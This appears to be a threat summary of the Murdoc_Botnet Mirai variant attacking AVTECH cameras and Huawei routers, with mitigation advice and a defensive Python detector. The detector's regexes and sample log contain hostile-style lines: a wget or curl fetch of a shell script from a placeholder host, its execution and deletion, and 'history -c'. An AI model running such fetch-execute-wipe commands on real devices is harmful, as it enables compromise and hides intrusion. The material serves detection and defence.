Introduction

The emergence of a new variant of the Mirai malware, named Murdoc_Botnet [2] [3] [7] [8], highlights the ongoing threat to Internet of Things (IoT) devices. This malware specifically targets AVTECH IP cameras and Huawei HG532 routers, exploiting known vulnerabilities to compromise systems globally [4].

Description

A new variant of the Mirai malware [5] [8], known as Murdoc_Botnet [3] [7] [8], is actively targeting vulnerable IoT devices, specifically AVTECH IP cameras and Huawei HG532 routers [1] [4] [6] [7] [8] [10]. Active since July 2024 [7], the campaign has infected over 1,370 systems globally [1], with significant numbers of reported infections in Malaysia and Thailand [1] [2] [3] [5] [6] [7] [9] [10], Mexico [1] [2] [3] [5] [6] [7] [9] [10], Indonesia [1] [2] [3] [5] [6] [7] [9] [10], and Vietnam [1] [6] [7]. It exploits two known vulnerabilities, CVE-2024-7029 and CVE-2017-17215, to gain unauthorized access to these devices: CVE-2024-7029 is a command injection flaw in AVTECH cameras that is reachable over the network without authentication [3], while CVE-2017-17215 is a remote code execution vulnerability affecting Huawei routers [3].

Murdoc_Botnet takes a targeted approach, using over 500 samples of ELF binaries and shell scripts to compromise *nix systems. Once a device has been accessed, a shell script is executed that downloads and runs the botnet malware [1], selecting the build that matches the device's CPU architecture [1]. The malware runs bash scripts that leverage GTFOBins to download and execute payloads while erasing traces of its activity to evade detection. These payloads target AVTECH cameras through command injection [10], which allows the fetching, execution [1] [2] [3] [5] [9] [10], and removal of shell scripts [10]. The botnet's command set supports various DDoS attack methods [1], malware updates [1] [2] [4] [5] [6], and proxy services [1], posing significant risk to organizations that use these devices [4].

Conclusion

The extensive reach and advanced capabilities of Murdoc_Botnet underscore the increasing sophistication of cyber threats aimed at IoT devices [7]. To mitigate these threats [2] [4] [9], organizations are advised to monitor for suspicious processes and network traffic [1], exercise caution with untrusted shell scripts [2], apply firmware updates [1] [2] [4] [6], use strong and unique passwords [4], and implement network segmentation to isolate IoT devices from critical systems [4]. Changing default credentials is also recommended to enhance security against potential attacks. As cyber threats continue to evolve, proactive measures and vigilance are essential to safeguard IoT infrastructure.
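As an added example, not code from any of the referenced reports, the following Python script shows one way to act on the advice above to monitor for suspicious processes: it scans a process-execution audit log for the download, execute and delete sequence of shell scripts that the Description section attributes to the botnet, and records whether the same host also cleared its shell history. The audit-log format, the host names, the script names and the placeholder URL are all constructed for this example.

```python
import os
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed audit-log format for this example (one process execution per line):
#   "<epoch seconds> host=<hostname> pid=<pid> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\d+) host=(?P<host>\S+) pid=\d+ cmd=(?P<cmd>.*)$")

# One pattern per stage of the sequence. Each captures the shell script involved;
# only its basename is kept so the URL in the download and the local copy that
# is later executed and deleted are treated as the same script.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*?(?P<script>\S+\.sh)(?=\s|$)")
EXEC_RE = re.compile(r"(?:^|[\s;&|/])(?:sh|bash|\./)\s*(?P<script>\S+\.sh)(?=\s|$)")
REMOVE_RE = re.compile(r"(?:^|[\s;&|])rm\b.*?(?P<script>\S+\.sh)(?=\s|$)")
# Shell-history or log wiping is reported as an extra indicator, not required.
WIPE_RE = re.compile(r"history\s+-c|\.bash_history|>\s*/var/log/\S+")

WINDOW_SECONDS = 300  # fetch, execute and remove must all occur within this span


@dataclass
class ScriptTrail:
    """Timestamps of the stages seen for one (host, script) pair."""
    fetched: Optional[int] = None
    executed: Optional[int] = None
    removed: Optional[int] = None


@dataclass
class Alert:
    host: str
    script: str
    first_seen: int  # timestamp of the download
    last_seen: int   # timestamp of the deletion
    wiped_history: bool


def parse_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (timestamp, host, command) events in time order; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((int(m["ts"]), m["host"], m["cmd"]))
    events.sort(key=lambda e: e[0])
    return events


def find_fetch_execute_remove(text: str, window: int = WINDOW_SECONDS) -> List[Alert]:
    """Flag hosts where a shell script was downloaded, run and deleted within `window` seconds."""
    trails: Dict[Tuple[str, str], ScriptTrail] = defaultdict(ScriptTrail)
    wiped: Dict[str, bool] = defaultdict(bool)
    for ts, host, cmd in parse_log(text):
        if WIPE_RE.search(cmd):
            wiped[host] = True
        # A single command line may carry several stages ("wget ...; sh x.sh; rm x.sh"),
        # so every stage pattern is tried on every line. A later sighting of a stage
        # overwrites the earlier one, which is sufficient for this example.
        for stage, pattern in (("fetched", FETCH_RE), ("executed", EXEC_RE), ("removed", REMOVE_RE)):
            m = pattern.search(cmd)
            if m:
                script = os.path.basename(m["script"])
                setattr(trails[(host, script)], stage, ts)

    alerts = []
    for (host, script), t in trails.items():
        if None in (t.fetched, t.executed, t.removed):
            continue  # incomplete sequence: a script that is run but kept is not flagged here
        if t.fetched <= t.executed <= t.removed and t.removed - t.fetched <= window:
            alerts.append(Alert(host, script, t.fetched, t.removed, wiped[host]))
    alerts.sort(key=lambda a: a.first_seen)
    return alerts


# Constructed sample log (hosts, paths and the placeholder URL are not real).
# cam-01 shows the full sequence plus a history wipe, rtr-07 deletes the script
# far outside the window, and nas-02 downloads and runs a script but keeps it.
SAMPLE_LOG = """\
1737400000 host=cam-01 pid=311 cmd=/usr/sbin/ntpd -p pool.ntp.org
1737400010 host=cam-01 pid=402 cmd=wget http://EXAMPLE-PLACEHOLDER/bins/x.sh -O /tmp/x.sh
1737400012 host=cam-01 pid=403 cmd=chmod +x /tmp/x.sh
1737400013 host=cam-01 pid=404 cmd=sh /tmp/x.sh
1737400015 host=cam-01 pid=405 cmd=rm -f /tmp/x.sh
1737400016 host=cam-01 pid=406 cmd=history -c
1737400100 host=rtr-07 pid=120 cmd=wget http://EXAMPLE-PLACEHOLDER/update.sh -O /tmp/update.sh
1737400102 host=rtr-07 pid=121 cmd=sh /tmp/update.sh
1737401000 host=rtr-07 pid=140 cmd=rm -f /tmp/update.sh
1737400200 host=nas-02 pid=900 cmd=curl -o /tmp/backup.sh https://EXAMPLE-PLACEHOLDER/backup.sh
1737400201 host=nas-02 pid=901 cmd=bash /tmp/backup.sh
"""

if __name__ == "__main__":
    for a in find_fetch_execute_remove(SAMPLE_LOG):
        extra = " and cleared shell history" if a.wiped_history else ""
        print(f"{a.host}: {a.script} fetched, executed and removed within "
              f"{a.last_seen - a.first_seen}s{extra}")
```

The time window is the main tuning knob: the sample keeps it short so that a script that is executed and kept (nas-02) or deleted much later (rtr-07) is not flagged, while the rapid fetch, run and delete on cam-01 is. In practice the same sequence can be fed from whatever process auditing a device supports, and the history-wipe indicator raises the priority of an alert rather than gating it.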

References

[1] https://www.ihash.eu/2025/01/mirai-variant-murdoc-botnet-exploits-avtech-ip-cameras-and-huawei-routers/
[2] https://siliconangle.com/2025/01/21/new-mirai-variant-murdocbotnet-targets-avtech-cameras-huawei-routers/
[3] https://www.darkreading.com/cyberattacks-data-breaches/mirai-botnet-spinoffs-global-wave-ddos-attacks
[4] https://www.techzine.eu/news/security/127994/mirai-variant-murdoc_botnet-targets-cameras-and-routers/
[5] https://itdaily.be/nieuws/beveiliging/nieuwe-mirai-variant-murdocbotnet-richt-zich-op-huawei-routers/
[6] https://www.hendryadrian.com/mirai-variant-murdoc_botnet-exploits-avtech-ip-cameras-and-huawei-routers/
[7] https://clickcontrol.com/cyber-attack/new-mirai-botnet-hijacks-1370-ip-cameras-and-routers-in-global-attack-campaign/
[8] https://www.infosecurity-magazine.com/news/mirai-variant-targets-cameras/
[9] https://hackread.com/mirai-variant-murdoc-botnet-ddos-attacks-iot-exploits/
[10] https://securityaffairs.com/173294/cyber-crime/new-mirai-botnet-variant-murdoc-botnet-targets-avtech-ip-cameras-and-huawei-hg532-routers.html